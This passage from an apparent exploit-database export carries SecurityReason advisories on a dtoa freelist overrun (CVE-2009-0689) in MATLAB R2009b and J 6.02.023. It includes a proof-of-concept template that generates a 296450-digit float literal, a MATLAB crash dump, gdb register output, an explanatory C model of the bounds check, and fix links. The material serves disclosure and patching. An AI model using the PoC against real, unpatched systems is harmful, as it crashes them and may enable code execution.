uses the MuPAD symbolic engine, allowing access to computer algebra
capabilities. An additional package, Simulink, adds graphical
multidomain simulation and Model-Based Design for dynamic and embedded
systems.

In 2004, MathWorks claimed that MATLAB was used by more than one million
people across industry and the academic world.


--- 1. Matlab 2009b Array Overrun (code execution) ---
The problem is in the dtoa implementation. Matlab ships the same dtoa as
Mozilla, OpenBSD, MacOS, Google, Opera etc., and the bug is the same one
described in SREASONRES:20090625:

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not sufficient.
More information about the OpenBSD fix and similar ones is in
SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

A floating-point literal with enough digits makes dtoa overwrite memory:
Kmax is defined as 15, so the freelist array has 16 entries, but the dtoa
functions do not check the Kmax limit and can index element 16 or beyond
of freelist.


--- 2. Proof of Concept (PoC) ---
There are several ways to mount a successful attack. The simplest is to
create a script containing a malformed floating-point literal and execute
it. This can lead to code execution.
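Why the proof-of-concept literal has 296450 digits, as an added example
written for this page (not code from the advisory, from Matlab, from J, or
from the dtoa/gdtoa sources): dtoa's s2b() turns a decimal string of nd
digits into a Bigint whose allocation index k is the smallest power of two
that holds (nd+8)/9 32-bit words, and Balloc() uses that k directly as an
index into freelist[Kmax+1]. The functions below reproduce that arithmetic
with the Kmax = 15 the advisory names, compute the smallest digit count
that pushes k past Kmax, and model a Balloc()/Bfree() pair with the bounds
check that current upstream dtoa applies (the freelist is consulted only
for k <= Kmax; larger blocks go to malloc()/free() directly). The Bigint
layout here is a simplified assumption, not the real structure. The same
arithmetic applies to the K-Meleon, Camino and J advisories on this page,
which share the paragraph above.

```c
/* Added example (not from the advisory, Matlab, J or the dtoa/gdtoa sources):
 * the Balloc index arithmetic behind the 296450-digit proof of concept, and a
 * freelist allocator with the bounds check that the vulnerable dtoa lacks.
 * Kmax = 15 is the value the advisory names; the Bigint layout here is a
 * simplified assumption, not the real one. */
#include <stdio.h>
#include <stdlib.h>

#define KMAX 15                      /* freelist[] has KMAX+1 entries */

/* s2b() sizes its Bigint from the digit count nd: x = (nd+8)/9 words
 * (nine decimal digits fit in one 32-bit word), then k is the smallest
 * value with (1 << k) >= x. That k is passed straight to Balloc(). */
int balloc_index_for_digits(long nd)
{
    long x = (nd + 8) / 9;
    long y = 1;
    int k = 0;
    while (x > y) {
        y <<= 1;
        k++;
    }
    return k;
}

/* Smallest digit count whose k exceeds KMAX, i.e. the first literal length
 * for which an unchecked Balloc() reads freelist[KMAX+1], one past the end. */
long min_digits_exceeding_kmax(void)
{
    long words = (1L << KMAX) + 1;   /* need (nd+8)/9 > 2^KMAX */
    return words * 9 - 8;
}

/* Would unchecked dtoa index freelist[] out of bounds for this digit count? */
int digits_overrun_freelist(long nd)
{
    return balloc_index_for_digits(nd) > KMAX;
}

/* Simplified Bigint: header followed by 1<<k 32-bit words. */
typedef struct Bigint {
    struct Bigint *next;
    int k;
    int maxwds;
    unsigned int x[1];
} Bigint;

static Bigint *freelist[KMAX + 1];

/* Bounds-checked Balloc(): the freelist is only consulted for k <= KMAX;
 * larger requests go straight to malloc(). The unchecked version indexes
 * freelist[k] unconditionally, which is the overrun. */
Bigint *balloc_checked(int k)
{
    Bigint *rv;
    if (k >= 0 && k <= KMAX && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;
    } else {
        if (k < 0 || k > 30)
            return NULL;             /* refuse absurd sizes instead of shifting into UB */
        int words = 1 << k;
        rv = malloc(sizeof(Bigint) + ((size_t)words - 1) * sizeof(unsigned int));
        if (rv == NULL)
            return NULL;
        rv->k = k;
        rv->maxwds = words;
    }
    rv->next = NULL;
    return rv;
}

/* Matching Bfree(): blocks with k > KMAX never enter the freelist. */
void bfree_checked(Bigint *v)
{
    if (v == NULL)
        return;
    if (v->k > KMAX) {
        free(v);
    } else {
        v->next = freelist[v->k];
        freelist[v->k] = v;
    }
}

/* Allocate, verify the size, release; returns 1 if the round trip is sane. */
int balloc_roundtrip_ok(int k)
{
    Bigint *b = balloc_checked(k);
    if (b == NULL)
        return 0;
    int ok = (b->k == k && b->maxwds == (1 << k));
    bfree_checked(b);
    return ok;
}

int main(void)
{
    long poc = 296450;               /* digit count used by the advisory's PoC */
    printf("k for %ld digits = %d (Kmax = %d)\n", poc,
           balloc_index_for_digits(poc), KMAX);
    printf("smallest digit count past Kmax = %ld\n", min_digits_exceeding_kmax());
    return 0;
}
```

For 296450 digits k is 16, one past the last valid freelist index, and the
first digit count that does this is 294913; anything shorter stays at
k <= 15 and never leaves the array.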
\n \n-expl.m---------------------- \ncxib=0.<?php echo str_repeat(\"1\",296450); ?> \n-expl.m---------------------- \n \nMATLAB crash file:C:\\DOCUME~1\\WinXPae\\USTAWI~1\\Temp\\matlab_crash_dump.552 \n------------------------------------------------------------------------ \nSegmentation violation detected at Wed Dec 03 12:04:02 2009 \n------------------------------------------------------------------------ \n \nConfiguration: \nMATLAB Version: 7.9.0.529 (R2009b) \nMATLAB License: [PRIV] \nOperating System: Microsoft Windows XP \nWindow System: Version 5.1 (Build 2600: Dodatek Service Pack 3) \nProcessor ID: x86 Family 6 Model 7 Stepping 6, GenuineIntel \nVirtual Machine: Java 1.6.0_12-b04 with Sun Microsystems Inc. Java \nHotSpot(TM) Client VM mixed mode \nDefault Encoding: windows-1250 \n \nFault Count: 1 \n \nRegister State: \nEAX = 71c71c71 EBX = 188ade48 \nECX = 0000000a EDX = 188adde0 \nESI = 00000002 EDI = 00000003 \nEBP = 00c3dec0 ESP = 00c3de90 \nEIP = 7baf965e FLG = 00010206 \n \nStack Trace: \n[0] libut.dll:_Balloc(0x188adde0, 0x188ade48, 10, 1) + 14 bytes \n[1] libut.dll:_s2b(0x188adde0, 333333, 333333, 0x069f6bc7) + 112 bytes \n[2] libut.dll:_ut_strtod(0x188adde0, 0x19a80048 \n\"0.111111111111111111111111111111..\", 0x00c3e024, 0x00c3e028) + 1123 bytes \n[3] m_ir.dll:_mps_parse_matlab_real(0x188ad9f0, 0x00c3e068, 11, 0) + \n576 bytes \n[4] m_parser.dll:_mps_convert_M_NUMBER(0x188afb90, 0x1971d070, \n0x1971d048, 0x188afb90) + 71 bytes \n[5] m_parser.dll:_mps_convert_lval(0x188afb90, 0x1971d048, 0x1971d070, \n0) + 224 bytes \n[6] m_parser.dll:_mps_convert_M_Primary_4(0x188afb90, 0x1971d084, \n0x1971d0e8, 0x188afb90) + 191 bytes \n[7] m_parser.dll:_mps_convert_M_Stmt_2(0x188afb90, 0x1971d0d4, \n0x1971d0e8, 0x188afb90) + 247 bytes \n[8] m_parser.dll:_mps_convert_M_Stmts_2(0x188afb90, 0x1971d0e8, \n0x188afb90, 0x199d95b0) + 703 bytes \n[9] m_parser.dll:_mps_make_M_body_from_parse_tree(0x1971d0e8, 0, \n333337, 0) + 1283 bytes \n[10] 
m_parser.dll:_mps_convert_script(0x00c3e788, 18, 0x00c3e550 \n\"\u0111\u013a\u0102\", 0x7a36323f) + 1073 bytes \n[11] m_parser.dll:_mps_convert_M_File_1(0x188afb90, 0x189b3960, \n0x188afb90, 0x189b3960) + 66 bytes \n[12] m_parser.dll:_mps_M_to_IR_eval(0x00c3e7b4, 0x00c3e774, \n0x00c3e778, 0x00c3e77c) + 1471 bytes \n[13] m_parser.dll:_mps_M_to_IR(0x00c3e80f, 0x00c3e7b4, 0x00c3e774, \n0x00c3e778) + 307 bytes \n[14] m_interpreter.dll:public: void __thiscall \nMfh_mp::inCompileMfile(char const *)(0x03ba1a86 \"C:\\Documents And \nSettings\\WinXPa..\", 1, 0x1977c300 \"\u00a4\u00c4.z\", 0x00850000) + 492 bytes \n[15] m_interpreter.dll:public: void __thiscall \nMfh_mp::inCompileMOrLoadPFile(void)(0, 0x7a1459e2, 1, 0x1977c300 \"\u00a4\u00c4.z\") \n+ 266 bytes \n[16] m_interpreter.dll:public: virtual void __thiscall \nMlm_mp::load_file(void)(0, 0x1977c300 \"\u00a4\u00c4.z\", 0, 0x78134c58) + 32 bytes \n[17] m_dispatcher.dll:public: void __thiscall \nMlm_MATLAB_fn::try_load(void)(0x19728978, 0x78159334, 1, 0x00c3ee54 \n\"\u0158\u010f\u0102\") + 71 bytes \n[18] m_dispatcher.dll:public: void __thiscall \nMlm_MATLAB_fn::load(void)(0, 0x19728978, 0, 0xffffffff) + 76 bytes \n[19] m_dispatcher.dll:public: virtual void __thiscall \nMfh_file::dispatch_fh(int,struct mxArray_tag * *,int,struct mxArray_tag \n* *)(0, 0x00c3ef04, 0, 0x00c3ef64) + 364 bytes \n[20] m_interpreter.dll:int __cdecl inDispatchFromStack(int,char const \n*,int,int)(828, 0, 0, 0) + 623 bytes \n[21] m_interpreter.dll:_inCallFcnFromReference(0x19860138, 0x198d00e0, \n0, 0x02850000) + 80 bytes \n[22] m_interpreter.dll:int __cdecl inInterp(enum \ninDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag volatile *,int \n*)(1, 0, 1, 0) + 6204 bytes \n[23] m_interpreter.dll:int __cdecl protected_inInterp(enum \ninDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag *,int *)(1, 0, \n1, 0) + 39 bytes \n[24] m_interpreter.dll:int __cdecl inInterPcodeSJ(enum \ninDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag *,int 
*)(1, 0, \n1, 0) + 251 bytes \n[25] m_interpreter.dll:int __cdecl inExecuteMFunctionOrScript(class \nMfh_mp *,bool)(0x02850001, 0xffffffff, 0x19a187b0, 0) + 924 bytes \n[26] m_interpreter.dll:void __cdecl inRunMfile(int,struct mxArray_tag \n* *,int,struct mxArray_tag * *,class Mfh_mp *,struct inWorkSpace_tag \n*)(0, 0x00c3f988, 0, 0) + 466 bytes \n[27] m_interpreter.dll:public: virtual void __thiscall \nMfh_mp::dispatch_file(struct _mdUnknown_workspace *,int,struct \nmxArray_tag * *,int,struct mxArray_tag * *)(0, 0, 0x00c3f988, 0) + 23 bytes \n[28] m_interpreter.dll:public: virtual void __thiscall \nMfh_mp::dispatch_file(int,struct mxArray_tag * *,int,struct mxArray_tag \n* *)(0, 0x00c3f988, 0, 0) + 25 bytes \n[29] m_dispatcher.dll:public: virtual void __thiscall \nMfh_file::dispatch_fh(int,struct mxArray_tag * *,int,struct mxArray_tag \n* *)(0, 0x00c3f988, 0, 0) + 204 bytes \n[30] m_interpreter.dll:void __cdecl inEvalPcodeHeaderToWord(struct \n_memory_context *,int,struct mxArray_tag * * const,struct _pcodeheader \n*,class Mfh_mp *,unsigned long)(0x7bb796d4, 0, 0x00c3f988, 0x00c3f898) + \n73 bytes \n[31] m_interpreter.dll:enum inExecutionStatus __cdecl \nin_local_call_script_function(struct _memory_context *,struct \n_pcodeheader *,int,struct mxArray_tag * * const,unsigned \nlong,bool)(0x7bb796d4, 0x00c3f898, 0, 0x00c3f988) + 70 bytes \n[32] \nm_interpreter.dll:__catch$??1inProtectHotSegment@@QAE@XZ$0(0x7bb796d4, \n0x03ae5b90 \"ma\\n\", 0, 0) + 888 bytes \n[33] m_interpreter.dll:enum inExecutionStatus __cdecl \ninEvalCmdWithLocalReturn(char const *,int *,bool,bool,bool \n(__cdecl*)(void *,char const *))(0x03ae5b90 \"ma\\n\", 0, 0, 1) + 80 bytes \n[34] m_interpreter.dll:public: virtual enum inExecutionStatus \n__thiscall InterpBridge::EvalCmdWithLocalReturn(char const *,int \n*,bool,bool)(0x03ae5b90 \"ma\\n\", 0, 0, 1) + 25 bytes \n[35] m_interpreter.dll:_inEvalCmdWithLocalReturn(0x03ae5b90 \"ma\\n\", 0, \n0, 1) + 30 bytes \n[36] bridge.dll:enum inExecutionStatus 
__cdecl \nevalCommandWithLongjmpSafety(char const *)(0x03ae5b90 \"ma\\n\", 0, \n0x18894ac8, 0) + 67 bytes \n[37] bridge.dll:__catch$_mnParser$0(0x03d0b378, 0, 0x068ce201, 1) + \n300 bytes \n[38] mcr.dll:private: void __thiscall \nmcrInstance::mnParser_on_interpreter_thread(void)(0x18894b00, \n0x066fe5dc, 10, 0x00c3fccc) + 51 bytes \n[39] mcr.dll:public: void __thiscall \nboost::function0<void>::operator()(void)const (0, 0x18894ac8, 0, \n0x18894ac8) + 63 bytes \n[40] mcr.dll:public: virtual void __thiscall \nmcr::runtime::InterpreterThread::Impl::NoResultInvocationRequest::run(void)(0x7a27a800, \n0x066fe000 \"...y\", 0x00c3fb54, 0) + 53 bytes \n[41] mcr.dll:private: static void __cdecl \nmcr::runtime::InterpreterThread::Impl::invocation_request_handler(int)(0x18894ac8, \n0, 0x00030000 \"Actx \", 0x00c3fcb4) + 40 bytes \n[42] uiw.dll:bool __cdecl UIW_DispatchUserMessage(int,int)(9225, \n0x18894ac8, 0x00c3fcb4, 2) + 81 bytes \n[43] uiw.dll:long __stdcall HandleUserMsgHook(int,unsigned \nint,long)(0, 1, 0x00c3fcb4, 0x79c73540) + 95 bytes \n[44] USER32.dll:0x7e381923(0x00030000 \"Actx \", 1, 0x00c3fcb4, 0x7b38edd0) \n[45] USER32.dll:0x7e37b317(0x00c3fca4, 0x00c3fcb4, 0x00c3fcd0, 0) \n[46] USER32.dll:0x7e3778d0(0x00c3fca4, 48, 0x00030000 \"Actx \", 1) \n[47] ntdll.dll:0x7c90e473(0x00c3fd20, 0, 0, 0) \n[48] uiw.dll:void __cdecl UIW_GetAndDispatchMessage(struct tagMSG \n*)(0x00c3fd20, 2, 2, 0x18894ac8) + 20 bytes \n[49] uiw.dll:void __cdecl UIW_GetAndDispatchMessage(void)(0x03cddcf0, \n0, 0x03d40d00, 0) + 15 bytes \n[50] uiw.dll:void __cdecl ws_ProcessPendingEventsMainLoop(int,bool)(1, \n0, 0x00c3fdbc \"\u00fc\u00fd\u0102\", 0x7a27d26a) + 356 bytes \n[51] uiw.dll:void __cdecl ws_ProcessPendingEvents(int,int)(1, \n0xffffffff, 0x03cddcf0, 0x03d40d00) + 14 bytes \n[52] mcr.dll:public: void __thiscall \nmcr::runtime::InterpreterThread::Impl::process_events(class \nboost::shared_ptr<class mcr::runtime::InterpreterThread::Impl> const \n&)(0x00c3fe14, 2, 0x03d40768, 0x046add8c) + 
138 bytes \n[53] \nmcr.dll:__catch$?run@Impl@InterpreterThread@runtime@mcr@@QAEKABV?$shared_ptr@VImpl@InterpreterThread@runtime@mcr@@@boost@@PAUinit_context@1234@@Z$0(0x00c3fe14, \n0x03d44280, 0x7a27d630, 0x03d3d710) + 128 bytes \n[54] mcr.dll:unsigned long __cdecl run_init_and_handle_events(void \n*)(0x046add8c, 0, 0x03d40708, 0) + 76 bytes \n[55] mcr.dll:private: void __thiscall \nmcr::runtime::InterpreterThreadFactory::runThreadFunction(void)(0x00c3fec8, \n0x00c3fe80, 0x00c3fe84 \"\u0111\u0163\u0102\", 0x7bafb34c) + 108 bytes \n[56] matlab.exe:public: void __thiscall \nboost::function0<void>::operator()(void)const (336710, 0x0040b7f4, 0, \n0x78131731) + 63 bytes \n[57] matlab.exe:int __cdecl mcrMain(int,char const * * const)(1, \n0x03d43378, 4194304, 1) + 230 bytes \n[58] matlab.exe:_WinMain@16(4194304, 0, 336710, 1) + 75 bytes \n[59] matlab.exe:___tmainCRTStartup(1068244, 514808, 0x7ffde000, \n0x80544c7d) + 320 bytes \n[60] kernel32.dll:0x7c817077(0x00406faa, 0, 0x00905a4d, 3) \n \neax=0x71c71c71 \n \nedi=0x0 esi=0x2 \n \n--- 3. SecurityReason Note --- \nOfficialy SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n- MatLab \n- J \n \nThis list is not yet closed. \n \n \n--- 4. 
Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c 
\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. 
Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.com/exploit_alert/ - Exploit Database \nhttp://securityreason.com/security_alert/ - Vulnerability Database \n \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84946/matlab-overrun.txt"}, {"lastseen": "2016-12-05T22:22:14", "description": "", "published": "2010-01-09T00:00:00", "type": "packetstorm", "title": "J 6.02.023 Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-09T00:00:00", "id": "PACKETSTORM:84943", "href": "https://packetstormsecurity.com/files/84943/J-6.02.023-Array-Overrun.html", "sourceData": "`[ J 6.02.023 Array Overrun (code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 08.01.2010 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- J 6.02.023 Array Overrun (code execution) \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/79 \n \n \n--- 0.Description --- \nThe J programming language, developed in the early 1990s by Ken Iverson \nand Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL \nfunction-level languages created by John Backus. \n \nTo avoid repeating the APL special character problem, J requires only \nthe basic ASCII character set, resorting to the use of digraphs formed \nusing the dot or colon characters to extend the meaning of the basic \ncharacters available. 
Additionally, to keep parsing and the language \nsimple, and to compensate for the lack of character variation in ASCII, \nJ treats many characters which might need to be balanced in other \nlanguages (such as [] {} \"\" `` or <>) as stand-alone tokens or (with \ndigraphs) treats them as part of a multi-character token. \n \nBeing an array programming language, J is very terse and powerful, and \nis most suited to mathematical and statistical programming, especially \nwhen performing operations on matrices. J is a MIMD language. \n \n--- 1. J 6.02.023 Array Overrun (code execution) --- \nThe main problem exists in the dtoa implementation. J uses the same dtoa \nas MatLab, OpenBSD, MacOS, Google, Opera etc., \nand it is the same issue as SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nThe fix for SREASONRES:20090625 used by OpenBSD was not sufficient. \nMore information about the OpenBSD fix and similar ones is in SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nA float literal with an arbitrary number of digits can be supplied, and \nparsing it overwrites memory. Kmax is defined as 15, so the freelist \narray has 16 slots (indices 0..15). The dtoa functions do not check the \nKmax limit, so a sufficiently long mantissa makes them index freelist \nelement 16 or beyond. \n \n \n--- 2. Proof of Concept (PoC) --- \nThere are several ways to make a successful attack. The simplest is to \ncreate a script containing a defective floating-point literal and \nexecute it. This opens the possibility of code execution. \n \n-expl.ijs---------------------- \ncxib=0.<?php echo str_repeat(\"1\",296450); ?> \n-expl.ijs---------------------- \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x00452157 in ?? 
() \n \neax 0x4c2000 4988928 \necx 0x2c667c 2909820 \nedx 0x46d054 4640852 \nebx 0x48a607 296455 \nesp 0x98f720 0x98f720 \nebp 0x98f77c 0x98f77c \nesi 0x4363808 70662152 \nedi 0x0 0 \neip 0x452157 0x452157 \neflags 0x10206 [ PF IF RF ] \ncs 0x1b 27 \nss 0x23 35 \nds 0x23 35 \nes 0x23 35 \nfs 0x3b 59 \ngs 0x0 0 \n \nedi=0 \n \n(gdb) x/i $eip \n0x452157: test %eax,(%eax) \n(gdb) x/x $eax \n0x4c2000: 0x00000000 \n \n \n--- 3. SecurityReason Note --- \nOfficially SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n- MatLab \n- J \n \nThis list is not yet closed. \n \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c 
\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c 
